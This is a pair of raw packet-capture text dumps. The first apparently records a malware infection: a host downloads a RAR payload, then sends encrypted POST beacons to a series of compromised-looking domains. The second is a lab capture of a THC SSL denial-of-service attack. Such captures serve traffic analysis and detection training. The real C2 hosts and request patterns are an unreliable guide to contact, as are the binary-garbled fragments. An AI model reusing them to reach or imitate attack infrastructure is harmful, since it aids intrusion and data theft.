s9A2VSCIt7hCl4qZNCWOcZsKYk0yeSKeAtdYH7vSQ8PoT+50/bK1Q39aNZhGAo2Ft6hdDynix9t+ugIRtiV2D9u9wi0xC7qVr5URmqheErnLxKlZ0ZmxDfJhM036/ixoeK8JwkYcGDvFMI7v5zNZIl/ijUTPU9pKbJ//gdj/Ml6KAKxIpWVaweUPFpPTagfK9NmquFzscCEKcHYcEXhxXsJLxrz8wNydnL1teY75mIrPG0ZnjLif012sgqpPyzNcRlb/+zEKdS7VGxk7WpkPBa8Xrk21vWJn59siPGMeIhJgPMEsrtUdiffXT5JYSOFar5mo/7dFPmXjhq5JIwE5kwBj81lKckcHi/GwMjwkfgSjT1Vkil+jGVD5jXoPzYf+OTNLHtpHrv

2019-07-29 12:53:43.474193 IP 10.7.29.101.49234 > 46.21.147.29.80: Flags [P.], seq 1076:1511, ack 500659, win 64240, length 435: HTTP: GET /images/_2B4OwFC/6vjfFP_2B9uEz70SydULkkQ/V6jakRAWYD/AOLjnZYCVGOTKqeQQ/jEaRE2qFGZsu/lTmxprbzXB2/4
2A_2FkdM3tNun/gLYbeGst8_2BWnKGu7mGT/ZW8gMjxsJDmd0ZZG/9PzwD2p8rTJNi6b/XP71k6bvIt/7.avi HTTP/1.1
E…..@… .
..e…..R.P..Z.q=..P…….GET /images/_2B4OwFC/6vjfFP_2B9uEz70SydULkkQ/V6jakRAWYD/AOLjnZYCVGOTKqeQQ/jEaRE2qFGZsu/lTmxprbzXB2/42A_2FkdM3tNun/gLYbeGst8_2BWnKGu7mGT/ZW8gMjxsJDmd0ZZG/9PzwD2p8rTJNi6b/XP71k6bvIt/7.avi HTTP/1.1
Accept: text/html, application/xhtml+xml, /
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 46.21.147.29
DNT: 1
Connection: Keep-Alive

2019-07-29 12:53:43.474326 IP 46.21.147.29.80 > 10.7.29.101.49234: Flags [.], ack 1511, win 64240, length 0
E..(…….+….
..e.P.Rq=….\EP….0..
2019-07-29 12:53:43.681682 IP 46.21.147.29.80 > 10.7.29.101.49234: Flags [.], seq 500659:502119, ack 1511, win 64240, length 1460: HTTP: HTTP/1.1 200 OK
E……….v….
..e.P.Rq=….\EP…….HTTP/1.1 200 OK
Date: Tue, 30 Jul 2019 01:16:17 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
X-Powered-By: PHP/5.4.16
Set-Cookie: PHPSESSID=nthmmr62j6fsaf2hggojf13s20; path=/; domain=.irwhfgowe.xyz
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang=en; expires=Thu, 29-Aug-2019 01:16:17 GMT; path=/; domain=.irwhfgowe.xyz
Content-Length: 2480
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

iDQg1v7keVA4gr+mxyf3wTWxsEYT5FWxPBpHhrh16rHRe9Iip2KPkI9GRO0eYWaezOnTs1o7Ln5PrFQZBtSBel/lGZtP9VH80RM3P38c12eUEsKvwdKkE/3VZ6an6nVoZZ3T19GKf9DttVcerLiQv5tBKRKV+iZjg24EesCMirABxLQ+wTJzpN8kfTBrQMDWvypvRaxTAhqhcZaRq26/freNXboiT+ZAPNy+sPgowSK
6BtAP1WduOiF712W9t6Cdk80L4PL+xleVk1BDVlVW7g4dnuI4E1WE2kn+/CMJ/Kf2AG5RctwNGk4BkH9jYf24NjVynFk385fvuOrZ9se2yaY3xh147eK5mxumEXWfJ/0yvBDv7CpZHU+YEdzqIIikvPq7U6hdihZC7CfSQjmdJ9qU1nHfrMK6yTkXmjyR0grJshmTZN3KYgY81qMQXIvHvAcT6GU2KzmaBIeIA293m4
gC0mKNB1ck1l9DowLnu/g7NCcXZIKBCSDjlEDzrEV5T/YpqsoLvdMrpKUruqu54aW20bFCxejhrqtPia357tA2MFdl3xVm4XNq5+RIwOW2ELoenaXIm1FZuEuxJyadbyvcqofZX1jXhsg7G/74q0fxC8fkz2veauD9rOwlieO9M/bw5gH8DDS8NTummTzX+xU9QPfCEh2nYJL7/S0d6eOadYY5ik2ALj7pU4rEWCPPS
umt190uprB6A9c3udOXgoPejyeuCLQKUB9UxhMgxdsGOoVJPDdSfoqGHlT8a9UGrg6F0rCFAVBDxo0TXC+SaKu78hipFnneaVTHYxi/tLw088dQkzc1PmtnNOFqUXWBirxiBWw2rsGD6wOdO/YjSm8Mdo8AEfd6B39F0rFo78boD/zyLaRm+2g7bE2s7QWyvA9q3NKNW+nFLz
2019-07-29 12:53:43.681709 IP 46.21.147.29.80 > 10.7.29.101.49234: Flags [.], seq 502119:503579, ack 1511, win 64240, length 1460: HTTP
E……….u….
..e.P.Rq=….\EP…….Co8FRj6uTHdUAWhlgWreY51ooBHc1MWFrjvK6UUn5eAL9/xk0x24lVA/OPovbIZimxhyf3PCWxCWdHw0bQPPXEDYj6hRW7fZPMXzJZYAOcHFhAI5fdYIaQCYggVaYGuOqc0Zd91kKpapMNSUbz75oGEAeP/Zi52AlzLKtinJugHJfmiQb8427B7+PIWoRUhYZYBpyo49e/rhwaDlMpQl
SWuPZ/paqVnte83KWzj4/X8cH7CE4sckayWIntW8xeow9bvOffNMmaQrD5Bw+T9SE2CovTyZxej65akzcJAdEmd5uqXXU4qBkJvk50qT8tArWpv/y3DXZ5JdCTUhtF4q8IIuiq7P89s1SiQqGrMZXimGuCp9HA9uL8lmXOV0+frB9lFker1nkrtJZzEI6KdKO7iCGgXpu/blj/FQe/ztkEZ9UmCHI5vlDYOdYKMi6Jo
gZfdkZTISsrYWcnY1mIrGs1LRcfrckFrOES3prQ/EfNANOL9MhzmfRwvY+ZBpyQMWrDFtGpM+h9Sw2emgfWFtdLRV6g5mDEvuyteyAY3Z9tggaeq4kqdc5YHUXHyA82g5Zy46VbsrgfWE7tyyJAV7JMZ0yNqxF/oTd2JqKxgypPb1EL0M94CmmXnPOZALL7lwcUF7wcp8gp2I9RsfvN2em+T9MbY1PaKHr77+9m7T7z
GyBdWE1H2W1j2J/HIqwe9Z4JuMV1ZXSrwldKYpl1UaGBU8+T/s8Dzwwk7WOO/FybjcTO+D9lZVUX0Mq34j7avx3gbU2dTAKaAhfRwJ72MCq/UgaowkMk60Y7eMIc8IrRJ4e0/RzU/o82BGuG2mYkLNsL58cl5KB+/c7Nr2G08h5kZ08pVHMA2MBmHw4ugLOzb5xLjQG6f5Tsaq
X1kBbojRReBfy4NhzI9gQ5lfi6
gJkxWovKr4Btyy840zDiJMTR+IqCC9YLr1RyAZiKu19vtqrapY/RD5SG7zAQBVgUOJlKfV+HnVhxiN2haFhif2ZaAe5ADAzdiiOO4SLrus3RTwUETUOulf2pjdQaoDZJzqZ7xqDy28WVRasqO2Uy7w/ElhUNdOT7EXkBhvznV2PcBLjtkpai8/1fiRlPG9alpuXyMdbPOTcnNonbbwvIgpX1oQWmlCL3PVrmVfuQ3vB
dQKVKY5RkFJO0qSzkm8zSWe8YOTUC8LPDE8Ni58m/8ZNjQlaxECbeFIiTJO3Xa6S4dtq5odlHslN8XE4JE2/mmIzb3vYXVR6srXxKWm2O5GBkYcKaq6NtDvnoaeRuzXwlLsKovhbqUHWiSdQe/EBuq0IEYFpc15Qgm3QgCQ7u6fuKqohRadP0vvzb3zgJ0bOwfNOypnsLt4AnOsgxZofDVtiM81JYRCCD+Jo6pOJqWd
IQYawzJb1gfNL5gGH3/JSS1xLyiZ483xa/BDtgvU5Uz0jjCGjURD+S2P69TlL0eQ66ntI1D8/

2019-07-29 13:00:51.068034 IP 10.7.29.101.49247 > 109.123.223.76.80: Flags [P.], seq 1:179, ack 1, win 64240, length 178: HTTP: GET /demo/PhotoA.rar HTTP/1.1
E…..@…~.
..em{.L._.P…… 6P…)…GET /demo/PhotoA.rar HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64)
Host: kacafirek.cz
Connection: Keep-Alive
Cache-Control: no-cache

2019-07-29 13:00:51.068133 IP 109.123.223.76.80 > 10.7.29.101.49247: Flags [.], ack 179, win 64240, length 0
E..(……..m{.L
..e.P... 6…XP…z… 2019-07-29 13:00:51.258107 IP 109.123.223.76.80 > 10.7.29.101.49247: Flags [.], seq 1:1461, ack 179, win 64240, length 1460: HTTP: HTTP/1.1 200 OK E……….4m{.L ..e.P... 6…XP…….HTTP/1.1 200 OK
Date: Mon, 29 Jul 2019 17:00:51 GMT
Server: Apache
Last-Modified: Mon, 29 Jul 2019 08:06:23 GMT
ETag: “e60124-3eea3-58ecd5e2cfdc0”
Accept-Ranges: bytes
Content-Length: 257699
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-rar-compressed

2019-07-29 13:00:58.982371 IP 10.7.29.101.53764 > 172.16.5.2.53: 23168+ A? www.vitaindu.com. (34)
E..>.-….Z.
..e…….5..DZ…………www.vitaindu.com….. 2019-07-29 13:00:58.982627 IP 10.7.29.101.63732 > 172.16.5.2.53: 20475+ A? www.pr-park.com. (33) E..=……Z. ..e…….5.)..O…………www.pr-park.com….. 2019-07-29 13:00:58.982894 IP 10.7.29.101.65154 > 172.16.5.2.53: 28480+ A? www.2print.com. (32) E..<./….Z. ..e…….5.(..o@………..www.2print.com….. 2019-07-29 13:00:58.984127 IP 10.7.29.101.54427 > 172.16.5.2.53: 60399+ A? www.crcsi.org. (31) E..;.1….Z. ..e…….5.’.k………….www.crcsi.org….. 2019-07-29 13:00:58.987089 IP 10.7.29.101.49386 > 172.16.5.2.53: 17994+ A? www.spanesi.com. (33) E..=.2….Z. ..e…….5.).PFJ………..www.spanesi.com….. 2019-07-29 13:00:58.987781 IP 10.7.29.101.58486 > 172.16.5.2.53: 43542+ A? www.owsports.ca. (33) E..=.3….Y. ..e…..v.5.).A………….www.owsports.ca….. 2019-07-29 13:00:58.989882 IP 10.7.29.101.54356 > 172.16.5.2.53: 39383+ A? www.rs-ag.com. (31) E..;.4….Z. ..e…..T.5.’……………www.rs-ag.com….. 2019-07-29 13:00:58.991007 IP 10.7.29.101.60036 > 172.16.5.2.53: 34096+ A? www.c9dd.com. (30) E..:.5….Z. ..e…….5.&…0………..www.c9dd.com….. 2019-07-29 13:00:58.992556 IP 10.7.29.101.53486 > 172.16.5.2.53: 64159+ A? www.udesign.biz. (33) E..=.6….Y. ..e…….5.))…………..www.udesign.biz….. 2019-07-29 13:00:58.993571 IP 10.7.29.101.57888 > 172.16.5.2.53: 32553+ A? wpad.localdomain. (34) E..>.7….Y. ..e….. .5.p..)………..wpad.localdomain…..
2019-07-29 13:00:59.054760 IP 172.16.5.2.53 > 10.7.29.101.58486: 43542 2/0/0 A 198.105.254.64, A 198.105.244.64 (65)
E..].r……….
..e.5.v.I……………www.owsports.ca………………i.@………….i.@
2019-07-29 13:00:59.058581 IP 10.7.29.101.49248 > 198.105.254.64.80: Flags [S], seq 1756324796, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.8@….v
..e.i.@..Ph.c....... ................. 2019-07-29 13:00:59.059556 IP 172.16.5.2.53 > 10.7.29.101.53486: 64159 2/0/0 A 198.105.254.64, A 198.105.244.64 (65) E..].s.......... ..e.5...I$..............www.udesign.biz..................i.@.............i.@ 2019-07-29 13:00:59.060024 IP 10.7.29.101.49249 > 198.105.254.64.80: Flags [S], seq 331088107, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0 E..4.9@....u ..e.i.@.a.P.......... ................. 2019-07-29 13:00:59.070348 IP 172.16.5.2.53 > 10.7.29.101.49386: 17994 2/2/4 A 104.26.2.86, A 104.26.3.86 (204) E....t.......... ..e.5....P.FJ...........www.spanesi.com.................h..V............h..V.............jean.ns cloudflare...............ben.R.n............;g.n..........$... I........;g.M............:y.M..........$... I........:y 2019-07-29 13:00:59.070711 IP 10.7.29.101.49250 > 104.26.2.86.80: Flags [S], seq 4069494565, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0 E..4.:@....
..eh..V.b.P…%…… .z……………
2019-07-29 13:00:59.083033 IP 172.16.5.2.53 > 10.7.29.101.54356: 39383 2/2/4 A 104.31.73.201, A 104.31.72.201 (203)
E….u……….
..e.5.T……………..www.rs-ag.com……………..h.I………….h.H…………..karl.ns
cloudflare……………jade.P.K…………;..K……….$… I……..;..l…………:..l……….$… I……..:.
2019-07-29 13:00:59.083341 IP 10.7.29.101.49251 > 104.31.73.201.80: Flags [S], seq 4209286921, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.;@….5
..eh.I..c.P… …… ……………..
2019-07-29 13:00:59.092781 IP 172.16.5.2.53 > 10.7.29.101.60036: 34096 2/2/4 A 104.25.152.27, A 104.25.153.27 (202)
E….v……….
..e.5…….0………..www.c9dd.com……………..h……………h…………….rita.ns
cloudflare……………west.O.J…………:..J……….$… I……..:..k…………;..k……….$… I……..;.
2019-07-29 13:00:59.093130 IP 10.7.29.101.49252 > 104.25.152.27.80: Flags [S], seq 2628897602, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.<@….. ..eh….d.P…B…… …………….. 2019-07-29 13:00:59.124030 IP 172.16.5.2.53 > 10.7.29.101.54427: 60399 2/2/4 CNAME crcsi.org., A 198.12.145.135 (204)
E….w……….
..e.5….h)………….www.crcsi.org…………………………………………ns56.domaincontrol.com…………..ns55.N.I…………K..I……….&…”…………m……….aJk..m……….&…!………..
2019-07-29 13:00:59.124420 IP 10.7.29.101.49253 > 198.12.145.135.80: Flags [S], seq 3693053252, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.=@…s.
..e…..e.P…D…… ……………..
2019-07-29 13:00:59.134787 IP 104.26.2.86.80 > 10.7.29.101.49250: Flags [S.], seq 1144726242, ack 4069494566, win 64240, options [mss 1460], length 0
E..,.x…..wh..V
..e.P.bD;”….&...a....... 2019-07-29 13:00:59.134962 IP 10.7.29.101.49250 > 104.26.2.86.80: Flags [.], ack 1, win 64240, length 0 E..(.>@....
..eh..V.b.P…&D;”.P…y…
2019-07-29 13:00:59.135089 IP 10.7.29.101.49250 > 104.26.2.86.80: Flags [P.], seq 1:771, ack 1, win 64240, length 770: HTTP: POST / HTTP/1.1
E..*.?@…].
..eh..V.b.P…&D;”.P…….POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 536
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.spanesi.com
Cache-Control: no-cache

Ax7m7VKupQADayozBXlPTlW3Rb+iyGxupqnfz1KXuEtJqsumvHWGTXgJ3la7IYWyy0wrfcd5tq0Nv67QGRfa37je7asRoaeUZBk3+iNqzlDQfA5IlmanUWhBkpt6ZvKUdmZZ09qLi6STnTf1e8iYiZFDHV044pCuy5LeLxK83OAITgApwVagHdhrfPJ0aVaMwjbgjaLz/50Y1fI2IXTVCi3T1cJt3/qeUYHullfNxq/RhDqhf0+7FujpJC/mzBY9wTmslIDYVlPBBkxidBjvOXZbqxwXVr+tpsacYBRwCAUzqodwinxWAE+dL0w39CJzQkeDpIsP7Ie+uXE82zpN4CVrDcdENT1FKfEoSEgyIhif8lf4AEWirBJ8H7KfdQFT+rWN11eEqNzZcI0neS/w6AhPyUsXP8M7DI2Zhm3/1gkVs6MteuCbYZ6nXSHMa1T1txVasJ8QIuIXOBeHEj+6bmVcFiZbiFuVztE6eZJsE6lehw52lhdoJ5y+6s0lkNiWzYvmi/zEedIjhAJc02zaoQ==
2019-07-29 13:00:59.135140 IP 104.26.2.86.80 > 10.7.29.101.49250: Flags [.], ack 771, win 64240, length 0
E..(.y…..zh..V
..e.P.bD;”….(P…v~..
2019-07-29 13:00:59.153346 IP 172.16.5.2.53 > 10.7.29.101.65154: 28480 2/2/4 CNAME 2print.com., A 184.168.221.53 (202)
E….z……….
..e.5….~.o@………..www.2print.com…………………………….5………….ns27.domaincontrol……………ns28.O.J……….aJg..J……….&…!q………..k…………G..k……….&…”q……….
2019-07-29 13:00:59.153873 IP 10.7.29.101.49254 > 184.168.221.53.80: Flags [S], seq 1193526277, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.@@…5:
..e…5.f.PG#…….. ……………..
2019-07-29 13:00:59.155302 IP 104.31.73.201.80 > 10.7.29.101.49251: Flags [S.], seq 355223488, ack 4209286922, win 64240, options [mss 1460], length 0
E..,.{……h.I.
..e.P.c.,G….
`….B……
2019-07-29 13:00:59.155392 IP 10.7.29.101.49251 > 104.31.73.201.80: Flags [.], ack 1, win 64240, length 0
E..(.A@….;
..eh.I..c.P…
.,G.P…#…
2019-07-29 13:00:59.155532 IP 10.7.29.101.49251 > 104.31.73.201.80: Flags [P.], seq 1:773, ack 1, win 64240, length 772: HTTP: POST / HTTP/1.1
E..,.B@….6
..eh.I..c.P…
.,G.P…Nn..POST / HTTP/1.1
Accept: /
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 540
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.rs-ag.com
Cache-Control: no-cache

XXTc5yB8pQDhZhbvcwBrU1OYKjSIHRfuVCXVJsqxREL8MU9UVfvk6NEGuk8mLn6d9of2goBzO4ncAiRL0nhgYuUZIkCk/czwzlMog/4/3ohpHmcPJ7e2pFZfvWGSSgdnBNt/1Wk2SJ2JiG4yx4XMfJ9wvPi9Ka8XgZYU43vQIqgC+k8tEmMcmqYPXVOe7LApGAcTprzV80reoZUgsQcC7XVKzYwYBqiyFZdClmwgpge3ALD2XNTtaHw75PuO1i2pgc3zcV0WOt0ulFzN6IexXdr62goFpRuT2aQdjNI9ZUYpWxLs0uWgjFhM1Os7djM7Pjtn0rX2jKQHFnr9i3565oL0jsqhNqphYFWeMsY+VwYxJJBe08X0CnEPO6N5x3eyqTzKSWDM7+un3diIY20b7H6iBnMRF5xV9YZBtLNHP5p+03UFutC3RqBlQVwuvdphGuymo8uHmHdhvwOYyR2sU1AABoZHo66XaXj8JflxcbSWTmzbuOS+ZySWEEei2bAPsaUlWRndr9aVx35jZOsH8psKMw==
2019-07-29 13:00:59.155592 IP 104.31.73.201.80 > 10.7.29.101.49251: Flags [.], ack 773, win 64240, length 0
E..(.|……h.I.
..e.P.c.,G…..P… …
2019-07-29 13:00:59.171901 IP 104.25.152.27.80 > 10.7.29.101.49252: Flags [S.], seq 924723558, ack 2628897603, win 64240, options [mss 1460], length 0
E..,.}….b.h…
..e.P.d7.)f…C`….V……
2019-07-29 13:00:59.172132 IP 10.7.29.101.49252 > 104.25.152.27.80: Flags [.], ack 1, win 64240, length 0
E..(.C@…..
..eh….d.P…C7.)gP…….
2019-07-29 13:00:59.172470 IP 10.7.29.101.49252 > 104.25.152.27.80: Flags [P.], seq 1:768, ack 1, win 64240, length 767: HTTP: POST / HTTP/1.1
E..’.D@…..
..eh….d.P…C7.)gP….u..POST / HTTP/1.1
Accept: /
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 536
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.c9dd.com
Cache-Control: no-cache

biRN0zTRpADIHVQlj0s8Xof2rF4sqrrVqBmtdiNN5r1aTGBCayDDw/GsDOn3drrVedvEeN/rz1NDDypzGUjdXX87PABis7mAdVShJmNAFzWiqtIbOTiF0mAlofT86Dj3ZA+lPMiQGBMzW1P6aRP5qR+btt2+T8j0dqUdUb+aJnjlneEERgnq595Ot8a/17XcGtdlcA+Yz2MbGK4RzYaWtdZGvTfM9zEkCRIiSCYvyVlYyV2Jqd7ehNDm0f9iIynTF3vZ9d1JTCLd9EuORzj4s5RjPWn7We1XfGVlafFt7upU1qtbVkc7OyEMavyhra8fa0PPevqlrT1x/tcYPbFEuJ5a6cLsjN7WH+3EGMRCW9xThRDB1XsDYmuC7WFYZtbUthL/S7Em+rhFbBkXxXToRhyhzCDz9WVI2qroJGIBkbCAsY44QfNUH5j0VoXufYlUSjL5A37rGZtJtJ87e3Wlr/2GEd5mGUv9P5+lEnbE9ZJEE/+SpZPFMgjqo2+y6LZQnyPwwLkG17ZxSd7ZYqcrUNg/

2019-07-29 13:00:59.687314 IP 10.7.29.101.52012 > 172.16.5.2.53: 33479+ A? www.vazir.se. (30)
E..:.o….Y.
..e…..,.5.&%3………….www.vazir.se…..
2019-07-29 13:00:59.699312 IP 58.64.191.148.80 > 10.7.29.101.49259: Flags [S.], seq 687621463, ack 3876635042, win 64240, options [mss 1460], length 0
E..,……h.:@..
..e.P.k(.EW….`….”……
2019-07-29 13:00:59.699454 IP 10.7.29.101.49259 > 58.64.191.148.80: Flags [.], ack 1, win 64240, length 0
E..(.p@…..
..e:@…k.P….(.EXP…….
2019-07-29 13:00:59.699544 IP 10.7.29.101.49259 > 58.64.191.148.80: Flags [P.], seq 1:756, ack 1, win 64240, length 755: HTTP: POST / HTTP/1.1
E….q@….+
..e:@…k.P….(.EXP…….POST / HTTP/1.1
Accept: /
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 520
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.vitaindu.com
Cache-Control: no-cache

8IlD6Hp/pQBUVUU1HQiLqL0qEQfqhORoTjln6RJOQ15jryfneNJiY86EOVLCoqU8bm0OsgXpA0255OV/bAT01clkJeyVjje3bxnPyOvfUsPdp3RPMckUExFs8ujM0HXhFPAwBD3zV8qMRTWUMmJ6279Vl4oR4y8nMYNUzUT6wR28tmL6c8XsaVi4OBQu2Nq/IKf6OeD7IWIFGjE0V7Z38R/syLDaPfmBm0j04GoUIPqmB01zH2k/Br0302lD9sG/tg3odcCXvrktL/YlCBy4NfihYgr8CxaZa4HPM1oVPyusFQHhfw9DDZ/X7aFC+nL8KeKhCK3RtjW4/4McUWA/fw3thufPiTO+fU6adClg6cz69ImGjn9e7M5+A+gcNHnLWNCqkDLoGPRFzTRjKk6Q9hbQQeX/ZidGdK0i+u1ldp2Btm89r0Ct0WSdAigO04vXdHZzaLphNqT/N7liOfi1IT4tX4U+0diO4uC+X699Z6Qf+DftG+NLC4Je+8Wpm+/6+HnqxHQ=
2019-07-29 13:00:59.699603 IP 58.64.191.148.80 > 10.7.29.101.49259: Flags [.], ack 756, win 64240, length 0
E..(……h.:@..
..e.P.k(.EX….P…….
2019-07-29 13:00:59.782318 IP 172.16.5.2.53 > 10.7.29.101.58389: 12756 1/2/2 A 210.140.73.39 (142)
E……………
..e.5….O.1…………www.ex-olive.com……………….I’………….ns01.telewave.ad.jp…………..ns01.epressd.O._…………JR.>………..z.2
2019-07-29 13:00:59.783153 IP 10.7.29.101.49262 > 210.140.73.39.80: Flags [S], seq 3843601751, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.r@….2
..e..I’.n.P…W…… ……………..
2019-07-29 13:00:59.819475 IP 157.7.107.91.80 > 10.7.29.101.49255: Flags [P.], seq 13821:15203, ack 811, win 64240, length 1382: HTTP
E………T…k[
..e.P.g)…..NSP…….2.528c.494-.542.973-1.114 1.5-1.716.449-.544.869-1.111 1.257-1.7l.15-.226c.329-.481.659-.983.988-1.505.329-.522.599-.963.808-1.324l.4-.692c1.607-2.889 2.963-5.91 4.055-9.03 2.459-7.089 3.861-14.502 4.16-22 0-.773.03-1.556.09-2.348 7.811 2.273 17.1 5.433 20.726 8.157 2.257 2 4.155 19.52 5.427 42.428h3.666c-1.332-21.91-3.381-42.477-7.013-45.182-4.658-3.512-16.387-7.25-24.858-9.593l-8.558-4.257c-.674-.339-1.488-.219-2.035.3l-5.791 5.523-4.25 4.034-4.19-4.079-5.731-5.569c-.54-.53-1.355-.662-2.035-.331l-8.784 4.289c-8.47 2.273-20.022 5.87-24.646 9.286-3.685 2.715-5.645 23.414-6.68 45.574h3.652zm57.856-53.069l.628-.783.284-.271 1.18-1.128.254.12 3.906 1.957 2.918 1.5v.135l-4.744 12.04-8.694-5.794-2.32-1.5 6.588-6.276zm-28.013 1.159l2.993-1.5 3.846-1.881.21-.06.09.075 1.407 1.37h.075l.569.557 6.51 6.366-2.245 1.5-8.829 5.779-4.621-12.04-.005-.166zm2.14 15.577c.194.505.606.894 1.12 1.061.514.167 1.076.092 1.529-.203l10.475-6.893 3.292-2.152 3.307 2.243 10.475 6.923c.45.303 1.013.386 1.53.225.518-.161.935-.548 1.134-1.053l1.766-4.515c-.686 4.963-1.905 9.837-3.636 14.539-.932 2.49-2.053 4.905-3.352 7.224l-.389.662-.7 1.174c-.359.572-.718 1.1-1.062 1.61l-.21.3c-.344.5-.7.963-1.047 1.4l-.434.527c-.344.406-.673.8-1.018 1.159-.689.743-1.429 1.436-2.215 2.075h-8.863c-.765-.637-1.485-1.326-2.155-2.062-.359-.391-.7-.8-1.062-1.249l-.374-.452c-.359-.467-.733-.963-1.092-1.505l-.1
2019-07-29 13:00:59.819587 IP 10.7.29.101.49255 > 157.7.107.91.80: Flags [.], ack 15203, win 62858, length 0
E..(.s@…..
..e..k[.g.P..NS)..%P….B..
2019-07-29 13:00:59.820412 IP 157.7.107.91.80 > 10.7.29.101.49255: Flags [P.], seq 15203:16585, ack 811, win 64240, length 1382: HTTP
E………T…k[
..e.P.g)..%..NSP…….5-.226c-.374-.542-.733-1.1-1.107-1.7l-.434-.722c-.209-.346-.418-.707-.629-1.084-1.273-2.322-2.369-4.737-3.277-7.224-1.852-5.166-3.093-10.53-3.7-15.984l2.278 5.902zm49.653 36.333l.1-25.993c.016-.483-.162-.953-.494-1.305-.331-.351-.79-.553-1.272-.561-.239-.011-.478.03-.7.12-.678.284-1.115.951-1.107 1.686v26.053h3.473zm-36.288-26.189c.328 1.337 1.526 2.277 2.903 2.277s2.575-.94 2.903-2.277c.157-.858-.076-1.741-.636-2.409-.558-.666-1.384-1.047-2.253-1.038l.075.015c-.885-.038-1.74.328-2.322.996-.582.668-.829 1.564-.67 2.436zm2.946 6.2v.015c-.968-.014-1.88.452-2.437 1.244-.556.792-.685 1.808-.343 2.714.456 1.128 1.552 1.867 2.769 1.867s2.313-.739 2.769-1.867c.058-.152.103-.308.13:

THC SSL Application Layer 7 Resource Denial of Service DoS Attack PCAP file Download

2016-05-10 22:55:21.763780 IP 192.168.1.1.80 > 192.168.1.100.46528: Flags [S.], seq 2840197845, ack 3419153931, win 5792, options [mss 1460,sackOK,TS val 19582549 ecr 48899446,nop,wscale 0], length 0
E..<..@.@……….d.P…I….&…..i……….
.*.U..%v….
2016-05-10 22:55:21.763794 IP 192.168.1.100.46528 > 192.168.1.1.80: Flags [.], ack 1, win 229, options [nop,nop,TS val 48899446 ecr 19582549], length 0
E..4.}@.@……d…….P..&..I………….
..%v.*.U
2016-05-10 22:55:21.763846 IP 192.168.1.100.46528 > 192.168.1.1.80: Flags [P.], seq 1:102, ack 1, win 229, options [nop,nop,TS val 48899446 ecr 19582549], length 101: HTTP
E….~@.@..+…d…….P..&..I…….A…..
..%v.*.U….`…\….wb.t.8……..L..0l..d.~+..-“9….5…….-.#….. ……………………………….
2016-05-10 22:55:21.763866 IP 192.168.1.100.46530 > 192.168.1.1.80: Flags [S], seq 2524174511, win 29200, options [mss 1460,sackOK,TS val 48899446 ecr 0,nop,wscale 7], length 0
E..<..@.@..,…d…….P.s……..r…………
..%v……..
2016-05-10 22:55:21.767307 IP 192.168.1.1.80 > 192.168.1.100.46528: Flags [.], ack 102, win 5792, options [nop,nop,TS val 19582549 ecr 48899446], length 0
E..44.@.@……….d.P…I….&p………..
.*.U..%v
2016-05-10 22:55:21.767853 IP 192.168.1.1.80 > 192.168.1.100.46530: Flags [S.], seq 2843979570, ack 2524174512, win 5792, options [mss 1460,sackOK,TS val 19582549 ecr 48899446,nop,wscale 0], length 0
E..<..@.@……….d.P…..2.s……7……….
.*.U..%v….
2016-05-10 22:55:21.767858 IP 192.168.1.100.46530 > 192.168.1.1.80: Flags [.], ack 1, win 229, options [nop,nop,TS val 48899447 ecr 19582549], length 0
E..4..@.@..3…d…….P.s…..3………..
..%w.*.U
2016-05-10 22:55:21.767900 IP 192.168.1.100.46530 > 192.168.1.1.80: Flags [P.], seq 1:102, ack 1, win 229, options [nop,nop,TS val 48899447 ecr 19582549], length 101: HTTP
E…..@.@……d…….P.s…..3…..A…..
..%w.*.U….`…\……..U..m…c…….kQ………….5…….-.#….. ……………………………….
2016-05-10 22:55:21.767914 IP 192.168.1.100.46532 > 192.168.1.1.80: Flags [S], seq 4040777504, win 29200, options [mss 1460,sackOK,TS val 48899447 ecr 0,nop,wscale 7], length 0
E..<zW@.@.<….d…….P.._ ……r…………
..%w……..
2016-05-10 22:55:21.772031 IP 192.168.1.1.80 > 192.168.1.100.46530: Flags [.], ack 102, win 5792, options [nop,nop,TS val 19582549 ecr 48899447], length 0
E..4af@.@.U……..d.P…..3.s……f3…..
.*.U..%w
2016-05-10 22:55:21.772608 IP 192.168.1.1.80 > 192.168.1.100.46532: Flags [S.], seq 2847078466, ack 4040777505, win 5792, options [mss 1460,sackOK,TS val 19582550 ecr 48899447,nop,wscale 0], length 0
E..<..@.@……….d.P…..B.._!……………
.*.V..%w….
2016-05-10 22:55:21.772613 IP 192.168.1.100.46532 > 192.168.1.1.80: Flags [.], ack 1, win 229, options [nop,nop,TS val 48899449 ecr 19582550], length 0
E..4zX@.@.<….d…….P.._!…C………..
..%y.*.V
